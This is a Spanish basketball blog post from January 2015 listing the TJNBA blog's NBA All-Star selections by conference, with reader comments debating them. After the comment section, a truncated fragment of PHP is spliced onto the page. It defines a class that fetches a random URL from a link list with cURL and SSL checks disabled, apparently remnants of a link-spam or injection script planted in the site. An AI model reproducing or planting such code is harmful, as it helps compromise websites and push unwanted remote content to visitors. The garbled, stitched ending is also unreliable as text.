Los All-Star de TJNBA

13 de January de 2015 por TheDeerHunter

Nuestro reinado de terror está a punto de comenzar. Os vamos a dar unas sencillas directrices para hacer lo que ya se conoce como un “Yao Ming”. Nuestra legión de seguidores deberá votar como posesos durante lo que queda de plazo para que el criterio del blog TJNBA se imponga al resto del planeta baloncestístico. Si no os parecen acertadas nuestras elecciones siempre tenéis la otra opción de rebotaros y dejar en los comentarios vuestras preferencias para el All-Star que se celebrará entre el 13 y el 15 de Febrero de 2015 en New York.

Llamará la atención que hayamos excluido a mitos como Bryant, Wade o Duncan, posiblemente con especial punto de injusticia por este último. Hemos considerado que al final de la fiesta lo que cuenta es la competición. Es un fin de semana ideal para descansar y no resulta coherente no hacerlo cuando suelen perderse un buen número de partidos en ese sentido, especialmente si hay otros que también merecen el reconocimiento.

CONFERENCIA OESTE

west15

Stephen Curry: Nunca hemos escondido nuestra debilidad por “El Artista”. Este curso su baloncesto preciosista ha adquirido mayor consistencia y se nota una mayor predisposición defensiva. Los resultados acompañan y en este momento es el mejor colocado en la carrera por el MVP. Casi 23 puntos por partido con excelentes porcentajes, 8 asistencias, 5 rebotes, 2 robos… Aún con la brutal competencia directa su elección es de cajón.

James Harden: “La Barba” es el máximo cañonero a estas alturas del curso con una producción nada efectista que ha ido directa a la vena de los resultados de su equipo. Le hemos notado una mayor capacidad de liderazgo y la ausencia de Howard le brindó gran visibilidad situándole en las quinielas del MVP y siendo nombrado jugador del mes de diciembre en el Oeste. Casi 27 puntos por partido, 6 rebotes, casi 7 asistencias y 2 robos le avalan.

Kevin Durant: No es un año fácil para Durantula pero estando disponible es elección obligada. Hasta ahora sólo ha amagado con arrancar. Cuando lo haga hay dos variables que con total seguridad quedarán despejadas: por un lado la imparable irrupción de los Thunder en zona playoffs y, por el otro, su regreso por derecho natural a la disputa del MVP.

Anthony Davis: El monstruo productivo de este año merece la nominación. Los resultados colectivos le han alejado de la carrera por el MVP pero sus números son de animal mitológico y de interior del momento. En su tercer año su progresión es indescriptible y las comparaciones ya no se ciñen a sus coetáneos sino que se lanzan sin decoro a la yugular de los mejores interiores de todos los tiempos. Prudencia.

Marc Gasol: Impecable campaña del mediano de los Gasol. El gran rendimiento de su equipo, en el que él es alfa y omega, le mantienen en las quinielas por el MVP y le otorgan cierta ventaja en la comparación directa con Cousins. En su caso, a su extraordinaria producción numérica hay que sumarle la no-numérica.

RESERVAS

Chris Paul: CP3 es un reloj pero por algún motivo su maestría le ha desgastado de cara a la opinión pública. Ha perdido encanto respecto a competidores directos como Curry o Lillard. Por si fuera poco el comportamiento de los Clippers está por debajo de lo que se esperaba de ellos. Sin embargo, el base más fiable de la liga merece ser reconocido con su presencia entre los mejores.

Damian Lillard: Otro año más que los Blazers se mueven entre los mejores del brutal Oeste. Pocos en la liga son tan “killers” como Lillard y pocos son los que molan tanto. Su hábitat natural son los grandes eventos, ya sean eliminatorias a cara de perro en playoffs como una noche para lucir galas en el All-Star.

Blake Griffin: Otro hombre espectáculo que luce mucho en este tipo de eventos. No es su año más brillante pero sí de los más serios y generosos. Puede chirriar tanta presencia Clipper para sus méritos, como también tantos interiores, pero no hay muchas alternativas mejores que puedan discutir la presencia del “cyborg” especialmente entre escoltas y aleros que es lo que más falta haría.

LaMarcus Aldridge: Es curioso que últimamente pocos le mencionen este curso en el debate surgido en torno al jugador mejor interior de la liga. A la chita callando, como siempre, cada vez que ha pillado al teórico coco se lo ha comido con patatas. Es el resumen de la carrera de Aldridge, hombre infravalorado donde los haya.

DeMarcus Cousins: Su campaña individual es impresionante. El único que numéricamente le resiste el paso a AD como demuestran sus fabulosos duelos directos. Sobra añadir el juego que da este hombre y sus ataques de genialidad en un evento como éste.

Russell Westbrook: Llegando sano es una fuerza de la naturaleza y todo un espectáculo para una noche como ésta. Últimamente ha bajado un poco el pistón pero volvió de la lesión como un tiro.

Dirk Nowitzki: Era de justicia meter a un representante de los Mavericks en este momento y él lo es por antonomasia.

CONFERENCIA ESTE

East-2015

Kyle Lowry: No es ningún secreto que Lowry ha sido uno de los mejores bases de la conferencia los últimos años. Con los Raptors tan bien colocados y sin DeRozan, ya no quedan excusas para negarle el reconocimiento. Ha sido el MVP del Este del mes de diciembre con todo merecimiento.

Jimmy Butler: Salvo catástrofe hay un premio que tiene dueño. El MIP para Butler es inevitable y su rendimiento a ambos lados de la cancha comienza a llamar a las puerta del MVP. No en vano ya fue elegido jugador mes en noviembre en la conferencia. Siempre supimos de sus cualidades defensivas pero no esperábamos tanto talento ofensivo latente. El arma secreta de los Bulls ha dejado de serlo.

LeBron James: Resulta irónico que la maldición de Dan Gilbert le haya regresado como un boomerang. Malos tiempos para “El Elegido” pero nadie puede olvidar quién es. Tampoco cometamos el error de descartarle para ninguna guerra.

Pau Gasol: Pau ha rejuvenecido en Chicago recuperando niveles ofensivos como hacía muchos años que no mostraba y con una actituda defensiva que quizá no le hayamos visto nunca, superando ampliamente a especialistas como Noah o Gibson en su propio terreno. En este momento pocos pueden negar que es el mejor interior de la conferencia de largo.

Al Horford: El carácter colectivo de los Hawks eclipsa en parte el valor de sus individualidades. Posiblemente hay otros interiores que presentan números superiores al dominicano pero no tantos con un impacto en el juego tan significativo. Con la discreta campaña de Noah es difícil discutirle a Horford la condición de mejor center de la conferencia.

RESERVAS

John Wall: El mejor base distribuidor de la conferencia lidera además la clasificación de máximos asistentes. Es un placer observar la madurez que ha alcanzado este jugador, así como el juego de los Wizards. Su presencia en el evento es absolutamente obligatoria.

Chris Bosh: A su equipo no tanto pero a Bosh le ha sentado estupendamente bien la decisión de LeBron. Este curso exhibe un nivel que no le veíamos desde su etapa en Toronto y entonces era considerado como uno de los mejores hombres altos de la liga y un arma ofensiva de primer orden.

Paul Millsap: Envidiable dupla interior la que puede permitirse Atlanta. Ellos gobiernan el Este con puño de hierro. Cualquier reconocimiento que se les haga este año es poco.

Nikola Vucevic: Una de las pocas alegrías que pueden llevarse los sufridos aficionados de Orlando este año es ver en acción a su pívot. No hay muchos jugadores que se acerquen a sus asombrosos números.

Jeff Teague: Menudo temporadón se está marcando este jugador como contrapunto perfecto al poderoso juego interior de su equipo. Nadie lo diría pero ahora mismo supera en PER tanto a Horford como a Millsap y es quizá el mejor jugador de estos sorprendentes Hawks.

Brandon Knight: Un hombre extremadamente subestimado que ha tenido que ir cerrando muchas bocas. Hubo un tiempo en que se consideró una tragedia en Milwaukee su llegada en lugar de Jennings. Hoy esa comparación resulta sonrojante. Los Bucks han sido una de las sensaciones de esta primera parte del curso y Knight es el principal culpable… pase lo que pase tras la lesión de Jabari Parker.

Comenta

12 comentarios a esta entrada

  1. Azabel dice:
    #1

    no quiero generar discordia como siempre hago, pero a comienzo de curso dije que tanto CP3 como Griffin perderian sus puestos de titulares en el all-star y se genero un gran alboroto y me tratan de todo menos de inteligente, bueno al menos mi opinion es compartida por tjnba

      Citar

  2. txusma dice:
    #2

    Azabel:
    no quiero generar discordia como siempre hago, pero a comienzo de curso dije que tanto CP3 como Griffin perderian sus puestos de titulares en el all-star y se genero un gran alboroto y me tratan de todo menos de inteligente, bueno al menos mi opinion es compartida por tjnba

    Por TheDeerHunter. Yo por ejemplo creo que Blake Griffin ha de ser titular por encima de Kevin Durant pero ahora mismo no tengo tiempo de explayarme en la explicación.

      Citar

  3. Nacho dice:
    #3

    Venga, a votar!
    En el Oeste, me falta Conley. No vería justo que fueran dos Thunder, por mucho que sean Westbrook y Durant, y nadie de San Antonio (por rara que sea su temporada), ni de Phoenix (por muy coral que sea su juego, como el de los Spurs)
    Tragaría con dos Clippers porque el equipo rinde (no cómo se esperaba, como decíais, pero rinde), y confieso, que aparte de sorprendernos, Green es nuevo en esto. Pero lo merece.
    No digo que los nombrados no lo merezcan, pero cuatro jugadores de equipos con balance negativo me parece excesivo.
    En el Este el que me falta es Wall en el equipo titular (¿por un Butler que ha bajado prestaciones-poco- tras su espectacular inicio?) Volviendo al argumento antes expuesto, lo de Vucevic no termina de convencerme (no dudo que lo merezca) y Valanciunas ha estado muy bien (no sé si para ir)
    Curioso que entre los 24 seleccionados (y probablemente de los que discutamos) solo haya cuatro de lo que antes llamábamos aleros. Dos 2 (Harden y Butler) y dos 3 (los amos del cotarro)
    Algo pasa

      Citar

  4. Ruxixón dice:
    #4

    A mí me duele que haya que colar a Durant por encima de Aldridge en un hipotético 5 inicial.Sé que salir con Davis,Marc y Aldridge en un mismo quinteto no se sostiene,pero para mí es mucha más importante reconocer la temporada del de los Blazers antes que aupar a Durant. Por nombres coincido en el resto,quizás echo en falta a Conley pero no sabría a quién quitar (Durant me sigue pareciendo el eslabón más débil por eso de las lesiones).

    En el este antes pondría a Millsap de PF titular,haciendo pareja con Pau de C.Si que llevaría a Wade,que ha subido el nivel cuando se ha visto obligado,y yo que siempre he sido muy crítico con él veo su convocatoria como una buena forma de recordar lo mucho que le infravaloro.Para meter a Wade habría que quitar a alguien,probablemente de la dupla Horford/Vucevic ya que Knight se lo merece como reconocimiento a la campaña de Milwaukee.

      Citar

  5. Futurman dice:
    #5

    Yo en el Este dejaba de titulares a Wall – Lowry – Buttler (de alero juega mucho) – Lebron – Gasol. Con Teague y Millsap de suplentes por Atlanta y con Bosh, Irving (que hace números), y un Vucevic o similar para cerrarlo.

    En el Oeste va mucha gente. Siempre será injusto por que hay demasiados buenos para pocas plazas.

    Pd: Bryant y Carmelo irán si no están lesionados, mercados grandes y superestrellas.

      Citar

  6. txusma dice:
    #6

    Ahora sí que puedo.

    Voy a ser original, voy a quitar a Horford en el Este, de hecho no lo voy a convocar, y en su lugar voy a llamar a su compañero de equipo, a Kyle Korver. Lo de Korver este año es simplemente increible: un 50% en TC, un 52’4% en T3 y un 93% en TL, además 4.2 rebotes y 3 asistencias. Aunque lo q el cuerpo me pide es llamar a 4 de los Hawks y dejar a Bosh fuera.

    En el Oeste, ya lo he dicho: Griffin en lugar de Durant como titular. El resto es bastante claro aunque también me falta Conley (cada vez q me acuerdo que era “el amigo de Oden” me troncho), pero a quien quitas?

      Citar

  7. Nacho dice:
    #7

    txusma:
    Ahora sí que puedo.

    Voy a ser original, voy a quitar a Horford en el Este, de hecho no lo voy a convocar, y en su lugar voy a llamar a su compañero de equipo, a Kyle Korver. Lo de Korver este año es simplemente increible: un 50% en TC, un 52’4% en T3 y un 93% en TL, además 4.2 rebotes y 3 asistencias. Aunque lo q el cuerpo me pide es llamar a 4 de los Hawks y dejar a Bosh fuera.

    En el Oeste, ya lo he dicho: Griffin en lugar de Durant como titular. El resto es bastante claro aunque también me falta Conley (cada vez q me acuerdo que era “el amigo de Oden” me troncho), pero a quien quitas?

    Cierto lo de Korver, antes lo obvié. Totalmente de acuerdo.
    Igual te compro lo de Griffin, y yo quitaba a Westbrook. Ha hecho dos o tres partidos de escándalo, otros buenos, otros normalitos, pero se ha perdido varios, y su equipo está en negativo.

      Citar

  8. Futurman dice:
    #8

    Antes que a Westbrook quito a Durant, se ha perdido muchos más partidos y apenas tiene grandes partidos xD Westbrook ahora está más flojo, pero llevaba un mes escandaloso.

      Citar

  9. Rompe dice:
    #9

    Yo me uno a los que quitarían a Durant, por el simple hecho de no haber jugado casi nada… Y de los Mavs llevaría a Ellis antes que a Dirk…

      Citar

  10. pcerezo dice:
    #10

    Buenas,

    Yo en el Oeste quitaría a Westbrook y pondría a Klye Thompson. Creo que está haciendo de largo mucha mejor temporada. No sé cuál de ellos es mejor o peor, pero la temporada de Thompson es bantante mejor que la de Westbrook.

      Citar

  11. Viva_Dirk dice:
    #11

    Cousins igual podría ser titular. Me falta tiempo últimamente para el blog, pero volveré!!

      Citar

  12. Futurman dice:
    #12

    Interiores hay 3 que se disputan 1 o dos puestos (depende donde pongas a Durant): Gasol, Cousins y AD. Los dos últimos tienen números estratosféricos pero record perdedor. Gasol tiene un impacto brutal en intangibles. Lo justo es que uno jugase en el Este para que Pau no estuviese tan rodeado de medianías xDDD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>